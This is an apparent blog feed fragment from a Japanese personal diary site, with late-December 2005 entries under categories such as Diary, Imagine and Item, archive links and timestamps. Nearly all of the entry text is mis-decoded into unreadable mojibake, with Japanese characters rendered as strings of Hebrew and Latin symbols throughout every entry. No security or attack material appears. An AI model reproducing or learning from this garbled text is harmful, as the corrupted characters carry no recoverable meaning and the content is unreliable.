    ֹבֳ¡¢¸¹¹ג₪ע¶ֻ¸ֲ₪₪ַ₪×₪ָ₪·₪ֶ₪כ¥×¥י₪ֻ₪ֿ÷³₪«ֳֶ₪­₪ֻ₪¯₪«₪ֳ₪¿₪ַ₪¹₪¬
    -₪₪«₪₪«־ֹ₪₪¥®¥¿¡¼₪ַ₪¹₪¿

    - -

    ¥×¥י₪־¥®¥¿¡¼₪ֿ¸½÷¥ױ¥ל¥ֳ¥ָ₪־°לֹפ₪ֻ¶ֳֻ¼₪¥¯¥»₪¬ֹױ₪₪₪ֶ₪·₪₪ֳ₪ֶ
    -ֳִֶך₪־¾ל½ך₪ע²¡₪µ₪¨₪כ₪ָ²»₪¬ִֿ₪ף₪¸₪ד₪ֳ₪ֶ₪כ₪ף₪ַ₪¹₪¬
    -÷£ֵ¥¥¹¥¿¡¼₪ֻ₪ֱ₪ח₪₪₪ָ₪₪₪¸₪ֳ₪ֶ₪ג₪י₪×₪¦₪«₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪¹¡£

    - -


    -¥®¥¿¡¼¥¥¹¥ָ₪ֻ₪·₪ָ₪«₪₪₪₪ָ
    -¼«¬₪ֻ₪ג₪×µׂ₪µ₪ף₪ֻ₪ג¥¹¥ָ¥ל¥¹₪ֻ₪₪כ₪·₪ֽ¡¡°¦״¡°¡¡¡ֻ

    - -


    -¢¨ ¡״²ר₪·₪₪ַ¯ֻצֲחֱ½¿ֽ₪ָ¥¥¹¥¿¡¼¡
    -

    - -
    ]]>
    -Diary -aristrist -2005-12-26T23:02:53+09:00 -
    - -[¶ו־₪ְ¡½ֱ] -http://aristrist.s57.xrea.com/mt/archives/000925.html - ÷עּכ¿¼ּכ ֱכ₪־³°₪¬¥·¥ד¥ף¥·¥ד¥ף₪₪₪¦₪־₪ַ ¡״₪¢¡¢¥µ¥ף¥¿¥¯¥ם¡¼¥¹₪ְ¥ָ¥¥«¥₪₪ְ!¡ ₪ֳ₪ְֶ×₪₪₪ט₪¯ֱכ₪ע³«₪±₪¿₪י ¡״¾ו¡¹ֲזֹק(₪·₪ד₪ף₪·₪ד₪ף₪¿₪₪₪ױ¡¼₪ף)¡₪־³§₪µ₪ף₪ַ₪·₪¿₪ב₪ך¡¼₪¯₪ך₪¹₪₪»₪₪·₪¿ֻ¿₪ַ₪¹ ִ¥₪ךְ₪ֳ₪ֶ»ֵ»צ₪·₪ָ₪ך₪₪¹ ₪½₪¦÷£ֶ₪ֶֶֻֽֿ ֳכָ׃₪ֻ¡״¥»¥כ¥ױ₪¦₪ֹ₪ף¡¿©₪₪₪·₪¿ ₪¹₪¦₪ֹ₪ף₪ַ90± !¦²(¡±¢¢¡±¡¨ ₪₪־₪ֻ¥¦¥₪₪! ₪³₪ל₪ֿ₪×ְֶ₪ְw ₪ָ¡¢»׳₪ֳ₪ֶ₪₪₪¿₪י₪ֹ₪¦₪ה₪י¹₪­´ײ°ד₪¨₪ֶ190±₪ַ₪·₪¿... ְי±»¥₪ַ§₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢₪×₪ִ₪ך₪¬810±₪·₪«₪¢₪ך₪₪¹₪ף¡¡¡¡°¦״¡°¡ֻ ּכ₪ֿM-1¸׳ּ״₪ֻ°ת₪ֳ₪«₪«₪ך₪₪¬₪י₪ג ¡״(¸½)¥«¥ף¥¿¡¼¥ל¡¦¥י¥¹¥ָ÷׳₪ך¡ ₪״ µ׳₪·₪ײ₪ך₪־ֶ£ֹֻ׳÷₪ה¥³¡¼¥״¡¼₪µ₪ף₪ה¥´¥ף₪־ּ₪ֻ²ס₪¨₪ֶ³₪·₪«₪ֳ₪¿ ֶ₪אµ₪₪ַ¹װ₪ֳ₪ֶ₪¿²¶₪גµמ±½׀ָײ₪¬₪¢₪ֳ₪¿₪־₪ַ ÷£ַ¯₪־²־₪₪¼‎₪ב₪ֻ£²¶±י₪י₪»₪ֶ₪ג₪י₪ֳ₪¿ ÷ַ¸ו₪ֿ ¡״₪¦₪¿₪´₪¨₪ָ¥י¥₪¥פ₪־ֵ¹¡¥«¥ף¥¿¡¼¥ל₪י₪·₪¯ ₪½₪־¾ל₪ֻµן₪כ¿ֱֽ´°ק₪ַ ¡״₪¦₪¿₪´₪¨¡ ₪ע£ק µ׳₪·₪ײ₪ך₪ֻ ¡״ֽד₪ע₪¯₪ְ₪µ₪₪¡ ₪ָ₪«²־₪ֳ₪¿₪ט¡¡¡¡°¦״¡°¡ֻ ¢¨ ¡״ׁ₪¥µ¥ף¥¿¥¯¥ם¡¼¥¹¡... - - -

    ÷עּכ¿¼ּכ
    -ֱכ₪־³°₪¬¥·¥ד¥ף¥·¥ד¥ף₪₪₪¦₪־₪ַ
    -¡״₪¢¡¢¥µ¥ף¥¿¥¯¥ם¡¼¥¹₪ְ¥ָ¥¥«¥₪₪ְ!¡
    -₪ֳ₪ְֶ×₪₪₪ט₪¯ֱכ₪ע³«₪±₪¿₪י

    - -

    ¡״¾ו¡¹ֲזֹק(₪·₪ד₪ף₪·₪ד₪ף₪¿₪₪₪ױ¡¼₪ף)¡₪־³§₪µ₪ף₪ַ₪·₪¿₪ב₪ך¡¼₪¯₪ך₪¹₪₪»₪₪·₪¿ֻ¿₪ַ₪¹

    - -

    ִ¥₪ךְ₪ֳ₪ֶ»ֵ»צ₪·₪ָ₪ך₪₪¹
    -₪½₪¦÷£ֶ₪ֶֶֻֽֿ

    - -

    ֳכָ׃₪ֻ¡״¥»¥כ¥ױ₪¦₪ֹ₪ף¡¿©₪₪₪·₪¿
    -₪¹₪¦₪ֹ₪ף₪ַ90± !¦²(¡±¢¢¡±¡¨
    -₪₪־₪ֻ¥¦¥₪₪!
    -₪³₪ל₪ֿ₪×ְֶ₪ְw

    - -

    ₪ָ¡¢»׳₪ֳ₪ֶ₪₪₪¿₪י₪ֹ₪¦₪ה₪י¹₪­´ײ°ד₪¨₪ֶ190±₪ַ₪·₪¿...
    -ְי±»¥₪ַ§₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢₪×₪ִ₪ך₪¬810±₪·₪«₪¢₪ך₪₪¹₪ף¡¡¡¡°¦״¡°¡ֻ

    - -

    ּכ₪ֿM-1¸׳ּ״₪ֻ°ת₪ֳ₪«₪«₪ך₪₪¬₪י₪ג ¡״(¸½)¥«¥ף¥¿¡¼¥ל¡¦¥י¥¹¥ָ÷׳₪ך¡ ₪״
    -µ׳₪·₪ײ₪ך₪־ֶ£ֹֻ׳÷₪ה¥³¡¼¥״¡¼₪µ₪ף₪ה¥´¥ף₪־ּ₪ֻ²ס₪¨₪ֶ³₪·₪«₪ֳ₪¿

    - -

    ֶ₪אµ₪₪ַ¹װ₪ֳ₪ֶ₪¿²¶₪גµמ±½׀ָײ₪¬₪¢₪ֳ₪¿₪־₪ַ
    -÷£ַ¯₪־²־₪₪¼‎₪ב₪ֻ£²¶±י₪י₪»₪ֶ₪ג₪י₪ֳ₪¿

    - -

    ÷ַ¸ו₪ֿ ¡״₪¦₪¿₪´₪¨₪ָ¥י¥₪¥פ₪־ֵ¹¡¥«¥ף¥¿¡¼¥ל₪י₪·₪¯
    -₪½₪־¾ל₪ֻµן₪כ¿ֱֽ´°ק₪ַ ¡״₪¦₪¿₪´₪¨¡ ₪ע£ק
    -µ׳₪·₪ײ₪ך₪ֻ ¡״ֽד₪ע₪¯₪ְ₪µ₪₪¡ ₪ָ₪«²־₪ֳ₪¿₪ט¡¡¡¡°¦״¡°¡ֻ

    - -

    ¢¨ ¡״ׁ₪¥µ¥ף¥¿¥¯¥ם¡¼¥¹¡
    -
    -

    ]]>
    -Diary -aristrist -2005-12-25T12:37:07+09:00 -
    - -[¼«¸ֲֶָ‏] -http://aristrist.s57.xrea.com/mt/archives/000924.html - ¥ָ¥¥«¥₪₪־¥ב¥¹₪ע¥µ¥ף¥¿₪ֻֿ¢₪ל₪ֶ₪₪₪«₪ל₪₪·₪¿ ÷£ּכ₪גֶָ¿ָ₪ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪¿₪ּ₪­(¡Q¡) ֳ־₪ך¹ח₪₪₪־´¹ס₪־₪×₪׀₪ֱ₪ד₪ף₪«₪יֻ¾ל₪־¥­¥א¥ֱ₪ע₪₪₪¿₪ְ₪­₪₪·₪¿¡£ ֶק₪₪₪ֿ¶¯־ץ₪ַ₪¹₪¬₪ב₪ֳ₪ֱ₪ד¥¦¥₪₪₪ַ₪¹₪ט(¡¦¢ֿ¡¦)b ֻטַ¯₪³₪־»‏´₪ִֻׂ₪±₪כ₪י₪·₪¯¡¢÷עַ¯₪ג₪₪₪¿₪ְ₪₪₪¿₪־₪ַ₪¹₪¬ ֿ·ֲ־₪־¥¿¥ֳ¥ׁ¡¼₪ֻ°₪·₪ֶ₪¿₪־₪ַ¡¢־הֲ¢¸ֻ₪־ֳז₪¬¥­¥א¥ֱ½­₪ְֻך־־₪µ₪ל₪ֶ₪·₪₪₪₪₪·₪¿(¡­¡¦¦״¡¦) ¥­¥א¥³₪¬»א₪ֻ₪₪·₪¿w ÷£ַ¯₪ֿ¼ד₪₪¥¿¥ֳ¥ׁ¡¼₪₪־₪ֲַח¾זֹ׳₪ַ₪¹¡£ ₪ָ₪³₪ם₪ַ ¡״¥¿¥ֳ¥ׁ¡¼¡ ₪ֳ₪ֱֶם¾־₪ַ₪₪¯₪ֶ¾¦ֹּ¾₪ַ₪¹₪ט₪ֽ ¡״¥¦¥©¡¼¥¯¥¥ף¡ ₪ָ₪« ¡״¥»¥ם¥ֶ¡¼¥׳¡ ₪₪¿₪₪₪ ¢¨ ¡״¥­¥¹₪ָ¥¡¼¥÷¡... - - -

    ¥ָ¥¥«¥₪₪־¥ב¥¹₪ע¥µ¥ף¥¿₪ֻֿ¢₪ל₪ֶ₪₪₪«₪ל₪₪·₪¿
    -÷£ּכ₪גֶָ¿ָ₪ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪¿₪ּ₪­(¡Q¡)

    - -

    ֳ־₪ך¹ח₪₪₪־´¹ס₪־₪×₪׀₪ֱ₪ד₪ף₪«₪יֻ¾ל₪־¥­¥א¥ֱ₪ע₪₪₪¿₪ְ₪­₪₪·₪¿¡£

    - -

    ֶק₪₪₪ֿ¶¯־ץ₪ַ₪¹₪¬₪ב₪ֳ₪ֱ₪ד¥¦¥₪₪₪ַ₪¹₪ט(¡¦¢ֿ¡¦)b

    - -

    ֻטַ¯₪³₪־»‏´₪ִֻׂ₪±₪כ₪י₪·₪¯¡¢÷עַ¯₪ג₪₪₪¿₪ְ₪₪₪¿₪־₪ַ₪¹₪¬
    -ֿ·ֲ־₪־¥¿¥ֳ¥ׁ¡¼₪ֻ°₪·₪ֶ₪¿₪־₪ַ¡¢־הֲ¢¸ֻ₪־ֳז₪¬¥­¥א¥ֱ½­₪ְֻך־־₪µ₪ל₪ֶ₪·₪₪₪₪₪·₪¿(¡­¡¦¦״¡¦)

    - -

    ¥­¥א¥³₪¬»א₪ֻ₪₪·₪¿w

    - -

    ÷£ַ¯₪ֿ¼ד₪₪¥¿¥ֳ¥ׁ¡¼₪₪־₪ֲַח¾זֹ׳₪ַ₪¹¡£

    - -


    -₪ָ₪³₪ם₪ַ ¡״¥¿¥ֳ¥ׁ¡¼¡ ₪ֳ₪ֱֶם¾־₪ַ₪₪¯₪ֶ¾¦ֹּ¾₪ַ₪¹₪ט₪ֽ
    -¡״¥¦¥©¡¼¥¯¥¥ף¡ ₪ָ₪« ¡״¥»¥ם¥ֶ¡¼¥׳¡ ₪₪¿₪₪₪

    - -


    -¢¨ ¡״¥­¥¹₪ָ¥¡¼¥÷¡
    -
    -

    ]]>
    -Diary -aristrist -2005-12-24T23:59:27+09:00 -
    - -[ֽחֹסִך³] -http://aristrist.s57.xrea.com/mt/archives/000923.html - ₪÷₪ֳ₪ָ±µֶ«₪·₪₪ֵ·µ₪₪¬ֲ³₪₪₪ֶ₪₪₪₪¹₪¬ ֽט½µ₪ֿ·כ¹½₪₪₪₪´¶₪¸₪־ֽ½ף₪ַ₪¹₪ֽ ₪×₪«₪²₪ֶֶַֻֽ₪ג₪×»ֵ»צ₪ַ₪¹₪ט₪³₪ך₪ד (¡¦¢ֿ¡¦;) ¥ײ¥µ¥₪¥¯₪ַ₪גַ¯ֻצ₪ֿ¿ֲֽ₪₪ֻֻ»₪·₪₪ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪ן ₪₪ף₪«₪¦₪ֱ₪־´₪»ֲו₪¬°ֽֽ₪ֻ¹ג₪₪µ₪₪¬₪¹₪כ₪ף₪ַ₪¹₪¬ µ₪₪־₪»₪₪₪ַ₪·₪ח₪¦₪«? ₪ג₪·₪«₪·₪¿₪י ֵ·°ז־¢₪ֳֻ¯₪«½»₪ף₪ַ₪₪₪ֶ₪ׂ₪½₪«₪ֻ₪¦₪ֱ₪־¥¬¥¹₪ע°ת₪₪₪ֶ₪₪₪כ₪ָ₪«₪¸₪ד₪₪₪₪ַ₪·₪ח₪¦₪« ₪½₪¦₪₪₪¨₪׀ ₪¦₪ֱ₪ֵֿ´¶¥³¥ף¥¯¥ך¡¼¥ָ₪·ת×₪₪ף₪ַ₪¹₪¬ ¾ו₪־³¬₪־½»¿ֽ₪¬»‏ְ¥ֹ¥¿¥׀¥¿₪ָ₪¦₪כ₪µ₪₪₪ָ₪­₪¬₪¢₪כ₪־₪ַ₪¹ ₪·₪«₪·¡¢₪¢₪ל¼ֲ₪ֵֿ·°ז־¢₪־½»¿ֽ₪¬₪ה₪ֳ₪ֶ₪¿₪ך₪¹₪כ₪ף₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪« ₪½₪¦₪₪כ₪ָ ₪ג₪·₪«₪·₪¿₪י¥ן¥¿¥·₪־ְ¸³ט₪גֱַ₪«₪ל₪ֶ₪₪₪כ²ִַ½ְ­₪¬₪¢₪ך₪₪¹₪ֽ !¦²(¡±¢¢¡±¡¨ ÷£ּכ₪«₪י°ל¿ֽ¥י¥ף¥׀¥ְ₪ֿ¹µ₪¨₪כ₪³₪ָ₪ֻ₪·₪₪¹ (¡­¡¦¦״¡¦) ¢¨ ¡״ֵפּ‎₪³₪ם₪¬₪·¡... - - -

    ₪÷₪ֳ₪ָ±µֶ«₪·₪₪ֵ·µ₪₪¬ֲ³₪₪₪ֶ₪₪₪₪¹₪¬
    -ֽט½µ₪ֿ·כ¹½₪₪₪₪´¶₪¸₪־ֽ½ף₪ַ₪¹₪ֽ
    -₪×₪«₪²₪ֶֶַֻֽ₪ג₪×»ֵ»צ₪ַ₪¹₪ט₪³₪ך₪ד (¡¦¢ֿ¡¦;)
    -¥ײ¥µ¥₪¥¯₪ַ₪גַ¯ֻצ₪ֿ¿ֲֽ₪₪ֻֻ»₪·₪₪ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪ן

    - -

    ₪₪ף₪«₪¦₪ֱ₪־´₪»ֲו₪¬°ֽֽ₪ֻ¹ג₪₪µ₪₪¬₪¹₪כ₪ף₪ַ₪¹₪¬
    -µ₪₪־₪»₪₪₪ַ₪·₪ח₪¦₪«?
    -₪ג₪·₪«₪·₪¿₪י
    -ֵ·°ז־¢₪ֳֻ¯₪«½»₪ף₪ַ₪₪₪ֶ₪ׂ₪½₪«₪ֻ₪¦₪ֱ₪־¥¬¥¹₪ע°ת₪₪₪ֶ₪₪₪כ₪ָ₪«₪¸₪ד₪₪₪₪ַ₪·₪ח₪¦₪«

    - -

    ₪½₪¦₪₪₪¨₪׀
    -₪¦₪ֱ₪ֵֿ´¶¥³¥ף¥¯¥ך¡¼¥ָ₪·ת×₪₪ף₪ַ₪¹₪¬
    -¾ו₪־³¬₪־½»¿ֽ₪¬»‏ְ¥ֹ¥¿¥׀¥¿₪ָ₪¦₪כ₪µ₪₪₪ָ₪­₪¬₪¢₪כ₪־₪ַ₪¹
    -₪·₪«₪·¡¢₪¢₪ל¼ֲ₪ֵֿ·°ז־¢₪־½»¿ֽ₪¬₪ה₪ֳ₪ֶ₪¿₪ך₪¹₪כ₪ף₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«

    - -

    ₪½₪¦₪₪כ₪ָ
    -₪ג₪·₪«₪·₪¿₪י¥ן¥¿¥·₪־ְ¸³ט₪גֱַ₪«₪ל₪ֶ₪₪₪כ²ִַ½ְ­₪¬₪¢₪ך₪₪¹₪ֽ

    - -


    -!¦²(¡±¢¢¡±¡¨

    - -


    -÷£ּכ₪«₪י°ל¿ֽ¥י¥ף¥׀¥ְ₪ֿ¹µ₪¨₪כ₪³₪ָ₪ֻ₪·₪₪¹ (¡­¡¦¦״¡¦)

    - -


    -¢¨ ¡״ֵפּ‎₪³₪ם₪¬₪·¡
    -
    -

    ]]>
    -Imagine -aristrist -2005-12-23T20:09:54+09:00 -
    - -[ֵ·¿ְ׳·ֿ₪] -http://aristrist.s57.xrea.com/mt/archives/000922.html - ¡״ֵ·¿ְ₪ַ¥ֶ¥ם₪¬µ¯₪­₪₪¹₪ט¡₪ָ₪«²ֻ₪ֲח³״ְ¸₪¬ִּף₪·₪ֶ¿ֱֽ₪¬₪»¡ִ ₪×ָט₪לֽֽ₪ַ₪¹(¡­¡¦¦״¡¦) ₪₪ף₪ָ₪₪₪¦₪«₪ג₪¦ ´¨₪¹₪®₪ֶ»׳¹ֽ²ףֿ©₪¬ִה¼ײֳז₪ַ₪¹ ₪«₪ם₪¦₪¸₪ֶ ¡״IWGP¥׳¥ל¥¼¥ף¥ָ·¸¡ ₪־±‏ח₪ֻ´ײ₪ֻ¹ח₪₪₪₪·₪¿£ק ₪₪₪ט₪₪₪ט2006ַ¯₪־ֲ­²»₪¬¥ך¥¢¥כ₪ֻ¹₪³₪¨₪ֶ₪­₪₪·₪¿ ÷£ֶַד₪ֳ₪¿ ¡״₪×₪₪₪·₪₪µםֶ‎¡ ₪־¾ּ£´¸ֲ₪¬ `06¡¥01¡¥01 ₪ַ₪·₪¿₪ַ₪¹ ¢¨ ₪³₪ל₪ג₪₪«₪₪«¥₪¥±₪₪¹₪... - - -

    ¡״ֵ·¿ְ₪ַ¥ֶ¥ם₪¬µ¯₪­₪₪¹₪ט¡₪ָ₪«²ֻ₪ֲח³״ְ¸₪¬ִּף₪·₪ֶ¿ֱֽ₪¬₪»¡ִ
    -₪×ָט₪לֽֽ₪ַ₪¹(¡­¡¦¦״¡¦)

    - -

    ₪₪ף₪ָ₪₪₪¦₪«₪ג₪¦
    -´¨₪¹₪®₪ֶ»׳¹ֽ²ףֿ©₪¬ִה¼ײֳז₪ַ₪¹

    - -

    ₪«₪ם₪¦₪¸₪ֶ ¡״IWGP¥׳¥ל¥¼¥ף¥ָ·¸¡ ₪־±‏ח₪ֻ´ײ₪ֻ¹ח₪₪₪₪·₪¿£ק

    - -

    ₪₪₪ט₪₪₪ט2006ַ¯₪־ֲ­²»₪¬¥ך¥¢¥כ₪ֻ¹₪³₪¨₪ֶ₪­₪₪·₪¿
    -÷£ֶַד₪ֳ₪¿ ¡״₪×₪₪₪·₪₪µםֶ‎¡ ₪־¾ּ£´¸ֲ₪¬ `06¡¥01¡¥01 ₪ַ₪·₪¿₪ַ₪¹

    - -

    ¢¨ ₪³₪ל₪ג₪₪«₪₪«¥₪¥±₪₪¹₪
    -
    -

    ]]>
    -Diary -aristrist -2005-12-22T21:18:17+09:00 -
    - -[±³³ּ½׀ְ¿] -http://aristrist.s57.xrea.com/mt/archives/000921.html - ₪ג₪¦₪¹₪°¥¯¥ך¥¹¥¥¹₪ַ₪¹₪ֽ ÷£ַ¯₪ֿ₪₪¿°ל¿ֽ₪ַ₪¹₪«₪½₪¦₪ַ₪¹₪« (¡'¦״'¡) ¥¥כ¥ָ₪₪¹₪₪₪ ¥ׁ¥ף¥ִ₪₪¹₪₪₪ ¥ײ¡¼¥ִ₪₪¹₪₪₪ ₪µ₪₪₪ױ₪₪¹₪₪₪ ¥µ¥ף¥¿₪µ₪ף₪ט₪ם₪·₪¯ (ֹ§¥`) ₪ִ¡¼₪«³ֵ·₪ָ₪«bidders₪ָ₪«₪ֳ₪ֶ ·כ¹½₪×ַד₪₪ְֶֹ₪¢₪כ₪ף₪ה₪ֽ ¢¨ ₪₪ף₪«ְ־₪־¼ײ... - - -

    ₪ג₪¦₪¹₪°¥¯¥ך¥¹¥¥¹₪ַ₪¹₪ֽ
    -÷£ַ¯₪ֿ₪₪¿°ל¿ֽ₪ַ₪¹₪«₪½₪¦₪ַ₪¹₪« (¡'¦״'¡)

    - -

    ¥¥כ¥ָ₪₪¹₪₪₪
    -¥ׁ¥ף¥ִ₪₪¹₪₪₪
    -¥ײ¡¼¥ִ₪₪¹₪₪₪
    -₪µ₪₪₪ױ₪₪¹₪₪₪

    - -

    ¥µ¥ף¥¿₪µ₪ף₪ט₪ם₪·₪¯ (ֹ§¥`)

    - -

    ₪ִ¡¼₪«³ֵ·₪ָ₪«bidders₪ָ₪«₪ֳ₪ֶ
    -·כ¹½₪×ַד₪₪ְֶֹ₪¢₪כ₪ף₪ה₪ֽ

    - -

    ¢¨ ₪₪ף₪«ְ־₪־¼ײ
    -

    - -
    ]]>
    -Item -aristrist -2005-12-21T20:33:16+09:00 -
    - -[ּד׿‏¬] -http://aristrist.s57.xrea.com/mt/archives/000920.html - ְטֶ₪־¥«¥ף¥¿¡¼¥ל´ְׁן»‏₪ֻֽ־²נ¿ֶֹ׃₪«₪יַ¯ְּ₪±ֱב¡¹₪ֻ¹װ₪ן₪ל₪כָא₪־¥½¥ם¥י¥₪¥פ₪־¥ֱ¥±¥ֳ¥ָ₪עֵצֶ½׀ִ¥₪־²ִַ½ְ­₪ג₪¢₪ֳ₪ֶ¸½ֳֿ₪ֻ¹װ₪±₪₪₪₪«₪גֳ־₪ל₪₪₪₪־₪ַ±‏±ח₪־°ױּ£₪ג¹‏₪ב₪ֶµד₪¯₪₪¯ְ¸³טָס₪ע÷ן₪ֳ₪ֶ₪₪ֹ₪ָ¾יֳּ₪ע¸ְ₪ֳ₪¿₪ך₪·₪₪¬₪י₪₪₪ם₪ף₪₪³₪ָ¸ְ₪¦₪¿₪ך₪·₪₪¬₪י₪ג₪µ₪י₪ך₪ַָד₪ֳ₪ֶ₪־₪±₪¿ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪ן (°לֻח500±₪×ַד₪₪ְֶ£ק ₪½₪ף₪¿ֶֹ׃(ִּ¾־)₪־¥י¥₪¥פ¥ֱ¥±¥ֳ¥ָ₪ֻ₪ֿ÷£₪₪י₪₪ף₪ָ¥ַ¥ג¥ֶ¡¼¥׳20¬¡¢₪¬ֹױ₪₪₪ֶ₪₪¹₪¿₪¢₪ך₪¬₪ָ₪¦ ₪ַ₪ג¿ֶֹ׃¡© ₪ג₪·₪«₪·₪¿₪י¥₪¥¥ֹ¥­₪־ּ¼₪¿₪ֱ₪₪ֹ₪ֿ¥«¥»¥ֳ¥ָ¥ַ¥ֳ¥­₪ָ₪«»‎₪ֳ₪ֶ₪₪₪₪«₪ג¡ִ¡¡₪ט¡©¡¡°¦״¡°¡¨¡ֻ ₪₪·₪ֶ₪ה¥×¥·¥ד¥ל₪¥ֶ¥ל¥³₪₪ף₪ֶ¡ִ (¸ֵ¡×£ק ₪·₪«₪·₪₪¢ֳֿ₪ֿ₪½₪ף₪₪³₪ָ₪ַ₪ֿ₪₪₪₪־₪ַ₪¹ ¿ֶֹ׃₪־²־₪¬ִ°₪­₪¿₪₪ֵ₪ֿ¥«¥»¥ֳ¥ָ¥ַ¥ֳ¥­₪ְ₪ם₪¦₪¬¥ֶ¥ל¥³₪ְ₪ם₪¦₪¬ַד₪¨¡× ₪ִ¡¼₪³₪ָ₪ַ (¥ֶ¥ל¥³₪ַֿה₪ֳ₪ֶ₪₪₪₪ָ₪×₪ג₪¦₪ט¡ִ ₪½₪¦¡¢²ז₪¬²ָ₪־¥ַ¥ֳ¥­₪־₪³₪ָ₪ַ₪¹₪ט ²¶₪ף₪ֱ₪ֻ₪ֿ₪₪ְ¥«¥»¥ֳ¥ָ¥ֶ¡¼¥׳₪־¹₪±₪כ¥³¥ף¥₪¬₪¢₪כ₪־₪ַ₪¹₪¬₪ֽ¡© ₪½₪₪₪ִ₪¬₪ַ₪¹₪ט ₪½₪ף₪¿ֶֹ׃₪«₪י₪»₪ֳ₪«₪¯₪₪₪¿₪ְ₪₪₪¿µ®½ֵ₪¥ך¥¢¥כ²»¸»₪ע₪ַ₪¹₪¡© ¿©₪י₪₪¹‏₪₪ה₪¬₪ך₪₪¹₪¿¡¡(-₪״-) ₪₪ף₪«¥ֶ¡¼¥׳ֱֶ‏₪·₪ֶ¥ך¥ג¥³¥ף₪־¥¹¥₪¥ֳ¥ֱ²¡₪·₪ֶ₪µ₪¢₪µ₪¢¡¢₪ָ₪«ֲװ₪ֳ₪ֶ₪₪₪¿₪ף₪ַ₪¹₪¬ ¡״₪«₪ֱ₪ד¡¡ִ ¡״₪«₪ֱ₪ד₪ֳ¡¡ִ ₪ָ₪«₪₪₪¦₪ְ₪±₪ַ°ל¸‏₪ֻ»ֿ₪₪ך₪₪»₪ף ₪½₪־₪¦₪ֱ₪ֻ ¡״₪ױ¡₪ֳ₪ֶָ°₪¯₪־₪ע₪ה₪ב ₪¿₪ְ₪¸₪ֳ₪ְֵָ₪±₪µ₪־ֳז₪ֻֽֿ₪±¹‏₪ף₪ְ₪₪²¶₪ֻ₪·₪׀₪·₪־ְִּ₪ע₪¯₪ל₪₪·₪¿¡ִ ₪½₪³₪ַ ¥ֱ¥ח¥ֳ¥׳₪ַ₪¹₪ט µ₪¹ח₪₪₪ע¹‏₪ב₪ֶ¼׀₪ב45¡כ₪«₪י·ע²נ₪׀₪ך₪־¥ֱ¥ח¥ֳ¥׳°לֱ®¡× ¡¥¡¥¡¥ֶ°₪­₪ְ₪·₪₪·₪¿ ¡¡¡³(¡­¡¼¡®)¥־₪₪´₪ָ¡× ÷£₪־ְ₪₪־ֳז ¥¹¥ׁ¥כ¥¿ְ÷¿ְ₪¬¸ֿ³י₪·₪ֶ₪₪₪₪¹ ₪³₪־ְטְ₪³¦₪¬ִה₪₪כ₪³₪ָ₪₪¯¥ַ¥¸¥¿¥כ²½₪·₪ֶ₪₪₪³₪¦₪ָ₪ג ²¶₪ֿ₪³₪־¥ֱ¥ח¥ֳ¥׳°ל₪ִ₪ֵַֿ₪ֳ₪ֶ₪₪₪¯₪ִ₪ג₪ך₪ַ₪¹¡× ₪ֿ₪¡¡ֱ¡¡₪¢¥ֱ¥ח¥ֳ¥׳¡×¥ֱ¥ח¥ֳ¥׳¡×¥ֱ¥ח¥ֳ¥׳!! ¡״₪³₪₪¥³¥י¡¼₪ֳ!!¡ (by ¶¶ֻ¸µַ¯) ¢¨ ₪ֹ₪¦₪ה₪י¹©»צ₪¬»ֿ₪₪ֳ₪¿₪ט₪¦₪ַ₪¹ (KBC)... - - -

    ְטֶ₪־¥«¥ף¥¿¡¼¥ל´ְׁן»‏₪ֻֽ־²נ¿ֶֹ׃₪«₪יַ¯ְּ₪±ֱב¡¹₪ֻ¹װ₪ן₪ל₪כָא₪־¥½¥ם¥י¥₪¥פ₪־¥ֱ¥±¥ֳ¥ָ₪עֵצֶ½׀ִ¥₪־²ִַ½ְ­₪ג₪¢₪ֳ₪ֶ¸½ֳֿ₪ֻ¹װ₪±₪₪₪₪«₪גֳ־₪ל₪₪₪₪־₪ַ±‏±ח₪־°ױּ£₪ג¹‏₪ב₪ֶµד₪¯₪₪¯ְ¸³טָס₪ע÷ן₪ֳ₪ֶ₪₪ֹ₪ָ¾יֳּ₪ע¸ְ₪ֳ₪¿₪ך₪·₪₪¬₪י₪₪₪ם₪ף₪₪³₪ָ¸ְ₪¦₪¿₪ך₪·₪₪¬₪י₪ג₪µ₪י₪ך₪ַָד₪ֳ₪ֶ₪־₪±₪¿ֻ¿₪ַ₪¹₪³₪ף₪׀₪ף₪ן
    - (°לֻח500±₪×ַד₪₪ְֶ£ק

    - -

    ₪½₪ף₪¿ֶֹ׃(ִּ¾־)₪־¥י¥₪¥פ¥ֱ¥±¥ֳ¥ָ₪ֻ₪ֿ÷£₪₪י₪₪ף₪ָ¥ַ¥ג¥ֶ¡¼¥׳20¬¡¢₪¬ֹױ₪₪₪ֶ₪₪¹₪¿₪¢₪ך₪¬₪ָ₪¦

    - -

    ₪ַ₪ג¿ֶֹ׃¡©
    -₪ג₪·₪«₪·₪¿₪י¥₪¥¥ֹ¥­₪־ּ¼₪¿₪ֱ₪₪ֹ₪ֿ¥«¥»¥ֳ¥ָ¥ַ¥ֳ¥­₪ָ₪«»‎₪ֳ₪ֶ₪₪₪₪«₪ג¡ִ¡¡₪ט¡©¡¡°¦״¡°¡¨¡ֻ
    -₪₪·₪ֶ₪ה¥×¥·¥ד¥ל₪¥ֶ¥ל¥³₪₪ף₪ֶ¡ִ (¸ֵ¡×£ק

    - -


    -₪·₪«₪·₪₪¢ֳֿ₪ֿ₪½₪ף₪₪³₪ָ₪ַ₪ֿ₪₪₪₪־₪ַ₪¹
    -¿ֶֹ׃₪־²־₪¬ִ°₪­₪¿₪₪ֵ₪ֿ¥«¥»¥ֳ¥ָ¥ַ¥ֳ¥­₪ְ₪ם₪¦₪¬¥ֶ¥ל¥³₪ְ₪ם₪¦₪¬ַד₪¨¡×
    -₪ִ¡¼₪³₪ָ₪ַ (¥ֶ¥ל¥³₪ַֿה₪ֳ₪ֶ₪₪₪₪ָ₪×₪ג₪¦₪ט¡ִ

    - -

    ₪½₪¦¡¢²ז₪¬²ָ₪־¥ַ¥ֳ¥­₪־₪³₪ָ₪ַ₪¹₪ט
